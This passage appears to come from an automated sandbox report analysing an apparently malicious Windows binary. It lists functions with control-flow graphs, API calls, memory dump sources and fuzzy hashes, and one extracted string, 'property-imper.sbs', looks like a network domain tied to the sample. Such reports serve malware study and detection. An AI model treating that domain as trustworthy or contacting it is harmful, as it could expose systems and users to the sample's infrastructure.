                                                                                              control_flow_graph 355 b2e35b-b2e393 call b54600 call b298f0 CoUninitialize 360 b2e3a0-b2e3d2 355->360 360->360 361 b2e3d4-b2e3ef 360->361 362 b2e3f0-b2e428 361->362 362->362 363 b2e42a-b2e499 362->363 364 b2e4a0-b2e4ba 363->364 364->364 365 b2e4bc-b2e4cd 364->365 366 b2e4eb-b2e4f3 365->366 367 b2e4cf-b2e4df 365->367 369 b2e4f5-b2e4f6 366->369 370 b2e50b-b2e515 366->370 368 b2e4e0-b2e4e9 367->368 368->366 368->368 371 b2e500-b2e509 369->371 372 b2e517-b2e51b 370->372 373 b2e52b-b2e533 370->373 371->370 371->371 374 b2e520-b2e529 372->374 375 b2e535-b2e536 373->375 376 b2e54b-b2e555 373->376 374->373 374->374 377 b2e540-b2e549 375->377 378 b2e557-b2e55b 376->378 379 b2e56b-b2e577 376->379 377->376 377->377 380 b2e560-b2e569 378->380 381 b2e591-b2e6b3 379->381 382 b2e579-b2e57b 379->382 380->379 380->380 384 b2e6c0-b2e6da 381->384 383 b2e580-b2e58d 382->383 383->383 386 b2e58f 383->386 384->384 385 b2e6dc-b2e70f 384->385 387 b2e710-b2e72b 385->387 386->381 387->387 388 b2e72d-b2e77d call b2b960 387->388
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: Uninitialize
                                                                                              • String ID: Lk$U\$Zb$property-imper.sbs$r
                                                                                              • API String ID: 3861434553-2211913898
                                                                                              • Opcode ID: 3845d573865959fe1401f3bc94afec5be575e09b93021658a5290b83fa9ad188
                                                                                              • Instruction ID: 2e2a4524124cb8cd780424d71e3a53a32532b42aaa12c28ec10b4f2302c0efa1
                                                                                              • Opcode Fuzzy Hash: 3845d573865959fe1401f3bc94afec5be575e09b93021658a5290b83fa9ad188
                                                                                              • Instruction Fuzzy Hash: C4A1AD7011C3E18AD7758F25D4947EBBBE1ABA3304F18899CD0E94B282DB3981068B56
                                                                                              Function 00B289A0 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 449 b289a0-b289b1 call b5cb70 452 b28cb3-b28cbb ExitProcess 449->452 453 b289b7-b289cf call b56620 449->453 457 b289d5-b289fb 453->457 458 b28cae call b5deb0 453->458 462 b28a01-b28bda 457->462 463 b289fd-b289ff 457->463 458->452 465 b28be0-b28c50 462->465 466 b28c8a-b28ca2 call b29ed0 462->466 463->462 468 b28c52-b28c54 465->468 469 b28c56-b28c88 465->469 466->458 471 b28ca4 call b2ce80 466->471 468->469 469->466 473 b28ca9 call b2b930 471->473 473->458
                                                                                              APIs
                                                                                              • ExitProcess.KERNEL32(00000000), ref: 00B28CB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0
                                                                                              • Opcode ID: 1007541d7da6445ac1e5ba9984ebb94b6d0ceabdc65ed47efbaa31626cf29c23
                                                                                              • Instruction ID: b179ac53598d44f591589011d801f8bcc8e6e9844d1d2f3d01ae604dc1e9bcc0
                                                                                              • Opcode Fuzzy Hash: 1007541d7da6445ac1e5ba9984ebb94b6d0ceabdc65ed47efbaa31626cf29c23
                                                                                              • Instruction Fuzzy Hash: 3F710573B547040BC70CDEBADC9235AFAD6ABC8710F09D83DA888D7391EEB89C054685
                                                                                              Function 00B48770 Relevance: 1.7, Strings: 1, Instructions: 466COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 475 b48770-b48791 476 b487a0-b487fa 475->476 476->476 477 b487fc-b48808 476->477 478 b48854-b48868 477->478 479 b4880a-b48812 477->479 481 b48870-b4889c 478->481 480 b48820-b48827 479->480 482 b48830-b48836 480->482 483 b48829-b4882c 480->483 481->481 484 b4889e-b488a2 481->484 482->478 486 b48838-b4884c call b5df70 482->486 483->480 485 b4882e 483->485 487 b48960-b48962 484->487 488 b488a8-b488cf call b5b7e0 484->488 485->478 492 b48851 486->492 489 b48c7e-b48c87 487->489 494 b488d0-b4892a 488->494 492->478 494->494 495 b4892c-b48938 494->495 496 b48967-b4896b 495->496 497 b4893a-b48946 495->497 499 b4898c-b48990 496->499 498 b48950-b48957 497->498 500 b4896d-b48973 498->500 501 b48959-b4895c 498->501 502 b48c75-b48c7b call b5b860 499->502 503 b48996-b4899f 499->503 500->499 506 b48975-b48984 call b5df70 500->506 501->498 504 b4895e 501->504 502->489 507 b489a0-b489ab 503->507 504->499 513 b48989 506->513 507->507 510 b489ad-b489d5 507->510 511 b489d7-b489dc 510->511 512 b489de 510->512 514 b489e0-b489ee call b282b0 511->514 512->514 513->499 517 b48a00-b48a0a 514->517 518 b489f0-b489fe 517->518 519 b48a0c-b48a0f 517->519 518->517 520 b48a23-b48a2a 518->520 521 b48a10-b48a1f 519->521 523 b48a30-b48a3b 520->523 524 b48c6c-b48c72 call b282c0 520->524 521->521 522 b48a21 521->522 522->518 526 b48a3d-b48a47 523->526 527 b48a8b-b48aa0 call b282b0 523->527 524->502 530 b48a5c-b48a60 526->530 536 b48c04-b48c29 527->536 537 b48aa6-b48aac 527->537 531 b48a50 530->531 532 b48a62-b48a6b 530->532 538 b48a51-b48a5a 531->538 534 b48a80-b48a84 532->534 535 b48a6d-b48a78 532->535 534->538 539 b48a86-b48a89 534->539 535->538 541 b48c30-b48c44 536->541 537->536 540 b48ab2-b48abb 537->540 538->527 538->530 539->538 542 b48ac0-b48aca 540->542 541->541 543 b48c46-b48c69 call b29190 call b282c0 541->543 544 b48ae0-b48ae5 542->544 545 b48acc-b48ad1 542->545 543->524 548 b48ae7-b48aea 544->548 549 b48b10-b48b22 544->549 547 b48ba0-b48ba6 545->547 551 b48ba8-b48bae 547->551 548->549 552 b48aec-b48b00 548->552 553 b48b28-b48b2b 549->553 554 b48bba-b48bc3 549->554 551->536 558 b48bb0-b48bb2 551->558 552->547 553->554 556 b48b31-b48b99 553->556 559 b48bc5-b48bcb 554->559 560 b48bcd-b48bd0 554->560 556->547 558->542 561 b48bb8 558->561 559->551 562 b48bd2-b48bfa 560->562 563 b48bfc-b48c02 560->563 561->536 562->547 563->547
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: =:;8
                                                                                              • API String ID: 2994545307-508151936
                                                                                              • Opcode ID: 9afed347897fd02d70b5ecc9a0212cf1483542c24af95721f24ccf427f11d282
                                                                                              • Instruction ID: d6576a8fee5e96557c2e48e8a9eb970f70734feff592828cba70074843d44cf5
                                                                                              • Opcode Fuzzy Hash: 9afed347897fd02d70b5ecc9a0212cf1483542c24af95721f24ccf427f11d282
                                                                                              • Instruction Fuzzy Hash: 13D17A72A487118BD714DA28CCD137FB7D2EBC5304F1985BDD8854B382EE749E06A792
                                                                                              Function 00B39530 Relevance: 1.7, Strings: 1, Instructions: 449COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 564 b39530-b39551 565 b39560-b39569 564->565 565->565 566 b3956b-b39573 565->566 567 b39580-b39589 566->567 567->567 568 b3958b-b39597 567->568 569 b395a0-b395a2 568->569 570 b39599-b3959e 568->570 571 b395a9-b395bb call b282b0 569->571 570->571 574 b395e1-b395f2 571->574 575 b395bd-b395c3 571->575 577 b39613 574->577 578 b395f4-b395fa 574->578 576 b395d0-b395df 575->576 576->574 576->576 579 b39616-b39639 call b60480 577->579 580 b39600-b3960f 578->580 584 b39640-b39652 579->584 580->580 582 b39611 580->582 582->579 584->584 585 b39654-b3965b 584->585 586 b396d2 585->586 587 b398b2 585->587 588 b396d0 585->588 589 b396f0-b396fd call b59800 585->589 590 b39715-b3971a 585->590 591 b39794-b3979f 585->591 592 b396da-b396ea call b59800 585->592 593 b398b8-b398bd call b282c0 585->593 594 b3989f-b398a9 call b282c0 585->594 595 b39662-b39676 585->595 596 b39982-b3998b 585->596 597 b39721 585->597 598 b39980 585->598 599 b398c7-b398db 585->599 600 b39706-b3970e 585->600 601 b3974b-b39762 call b607b0 585->601 602 b396ca 585->602 603 b39729-b39744 call b60480 585->603 604 b39769-b3977e call b282b0 call b60880 585->604 605 b3996c-b3997f call b282c0 585->605 586->592 589->600 590->587 590->591 590->593 590->594 590->596 590->597 590->598 590->599 590->601 590->604 590->605 607 b397a0-b397a9 591->607 592->589 626 b398c2-b398c4 593->626 594->587 608 b39680-b396b4 595->608 597->603 606 b398e0-b398f4 599->606 600->587 600->590 600->591 600->593 600->594 600->596 600->597 600->598 600->599 600->601 600->603 600->604 600->605 601->587 601->591 601->593 601->594 601->596 601->598 601->599 601->604 601->605 602->588 603->587 603->591 603->593 603->594 603->596 603->597 603->598 603->599 603->601 603->604 603->605 632 b39783-b3978d 604->632 605->598 606->606 617 b398f6-b398fe 606->617 607->607 618 b397ab-b397b5 607->618 608->608 619 b396b6-b396c3 608->619 629 b39900-b39911 617->629 630 b39937 617->630 631 b397c0-b397c9 618->631 619->586 619->587 619->588 619->589 619->590 619->591 619->592 619->593 619->594 619->596 619->597 619->598 619->599 619->600 619->601 619->602 619->603 619->604 619->605 626->599 633 b39920-b39927 629->633 635 b39940-b39946 630->635 631->631 634 b397cb-b397e3 631->634 632->587 632->591 632->593 632->594 632->596 632->598 632->599 632->605 633->635 636 b39929-b3992c 633->636 637 b397e5-b397ea 634->637 638 b397ec-b397ef 634->638 641 b39951-b39963 call b5df70 635->641 642 b39948 635->642 636->633 639 b3992e 636->639 640 b397f6-b39807 call b282b0 637->640 638->640 639->630 647 b39821-b39835 640->647 648 b39809-b3980f 640->648 641->605 642->641 650 b39851-b3985f 647->650 651 b39837-b3983a 647->651 649 b39810-b3981f 648->649 649->647 649->649 653 b39881-b39897 call b28fd0 650->653 654 b39861-b39864 650->654 652 b39840-b3984f 651->652 652->650 652->652 653->594 655 b39870-b3987f 654->655 655->653 655->655
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: efg`
                                                                                              • API String ID: 0-115929991
                                                                                              • Opcode ID: cda81db1fb42e43e576d5b1f7c7b4badb3113e0441bcf1a58a32fc3ff14bee47
                                                                                              • Instruction ID: 6aad9e83a419daf92f2cefa8fc3ea2366df7a3f71183a4a2b5fcfdf2125e6279
                                                                                              • Opcode Fuzzy Hash: cda81db1fb42e43e576d5b1f7c7b4badb3113e0441bcf1a58a32fc3ff14bee47
                                                                                              • Instruction Fuzzy Hash: 9DC11471D10215DBCB249F58DC92ABB73B4FF56310F2945A8E846A7391EBB4AD01C7A0
                                                                                              Function 00B5DF70 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL(00B5BA46,?,00000010,00000005,00000000,?,00000000,?,?,00B39158,?,?,00B319B4), ref: 00B5DF9E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                              Function 00B2E0D8 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: efg`
                                                                                              • API String ID: 2994545307-115929991
                                                                                              • Opcode ID: 474b77ddbe5043b4dba7a96a27eab6134e10c3d10a842b529218b08d98442789
                                                                                              • Instruction ID: 5474ed102bd7a8babd82036c02d71382c5bc1b8002d6df3e97f734c99603c163
                                                                                              • Opcode Fuzzy Hash: 474b77ddbe5043b4dba7a96a27eab6134e10c3d10a842b529218b08d98442789
                                                                                              • Instruction Fuzzy Hash: A2512972A043605BD720EB61AC927AF73D2AFD4314F1944A8E98D67242DF74AA06C7D3
                                                                                              Function 00B61580 Relevance: .3, Instructions: 293COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 1917aef124e6c7a7141eee68bc5aac46f719eb10fd22ab83944fa4fcd65ba6ac
                                                                                              • Instruction ID: 9ac7ecf97314e0badf277482e2718a71392a8ed249f730965ff834a9efc1bc93
                                                                                              • Opcode Fuzzy Hash: 1917aef124e6c7a7141eee68bc5aac46f719eb10fd22ab83944fa4fcd65ba6ac
                                                                                              • Instruction Fuzzy Hash: AB81F376A083418FD714DF68D860B2BB7E1EF99310F08897CE996D7291E678DC45C782
                                                                                              Function 00B60C80 Relevance: .3, Instructions: 269COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 2609e979c5d8acd710e3fb3979e1b7ed7ea1d232e62f78d97256e067a5c161ca
                                                                                              • Instruction ID: 6771d34c7757148b82934d40b91e5216b7f70d2ea000ea51ae3b1336477b7fc7
                                                                                              • Opcode Fuzzy Hash: 2609e979c5d8acd710e3fb3979e1b7ed7ea1d232e62f78d97256e067a5c161ca
                                                                                              • Instruction Fuzzy Hash: 487125356183419BC714AF29D850B2FB7E2FFD8710F1589BCE8858B2A5EB789C51C782
                                                                                              Function 00B5B8E0 Relevance: .2, Instructions: 217COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: ae30e94d81ab67f53846ea3f53395a54fbd833b336868c28ff07c57521ce238a
                                                                                              • Instruction ID: 437f243115dd3127b21be2e04a80fcbbb551ee164c8e0715aee2794bfd195bb6
                                                                                              • Opcode Fuzzy Hash: ae30e94d81ab67f53846ea3f53395a54fbd833b336868c28ff07c57521ce238a
                                                                                              • Instruction Fuzzy Hash: 0A516932A083508BD7249F299840B2BB7E2EBD5721F29C6FCDDD527391E7319C068B81
                                                                                              Function 00B41790 Relevance: .2, Instructions: 165COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
